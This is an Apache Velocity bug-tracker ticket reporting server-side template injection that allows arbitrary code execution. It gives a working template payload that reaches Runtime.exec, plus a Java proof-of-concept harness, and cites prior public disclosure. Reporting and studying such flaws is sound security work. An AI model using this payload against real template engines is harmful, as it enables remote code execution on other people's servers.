Uploaded image for project: 'Velocity'
  1. Velocity
  2. VELOCITY-877

Access to critical fields/methods allows execution of arbitrary code ('Template Injection')

    XMLWordPrintableJSON

    Details

    • Type: Bug
    • Status: Closed
    • Priority: Critical
    • Resolution: Not A Problem
    • Affects Version/s: 1.7
    • Fix Version/s: None
    • Component/s: Engine
    • Labels:

      Description

      It is possible to reference certain fields/methods, which eventually allow the execution of arbitrary methods.

      For example, by utilizing the 'class' field or 'getClass()' method of any variable, it is possible to get the variable's class object. This can be extended to get arbitrary class objects and execute arbitrary methods.

      For example, the following statement results in the execution of the 'xterm':

      $var.class.class.forName('java.lang.Runtime').getRuntime().exec('xterm').waitFor()
      

      As a standalone:

      import org.apache.velocity.VelocityContext;
      import org.apache.velocity.app.Velocity;
      import org.apache.velocity.context.Context;
      
      public class VelocityTest {
      
      	public static void main(String[] args) {
      		Context context = new VelocityContext();
      		context.put("var", "foo");
      		String instring = "$var.class.class.forName('java.lang.Runtime').getRuntime().exec('xterm').waitFor()";
      		Velocity.evaluate(context, null, "templateName", instring);
      	}
      
      }
      

      This issue has already been made public in the past by James Kettle in August 2015 (see http://blog.portswigger.net/2015/08/server-side-template-injection.html#Velocity) and via CVE-2015-5603 (see https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5603) and possibly others.

        Attachments

          Activity

            People

            • Assignee:
              sdumitriu Sergiu Dumitriu
              Reporter:
              mwulftange Markus Wulftange
            • Votes:
              0 Vote for this issue
              Watchers:
              3 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved: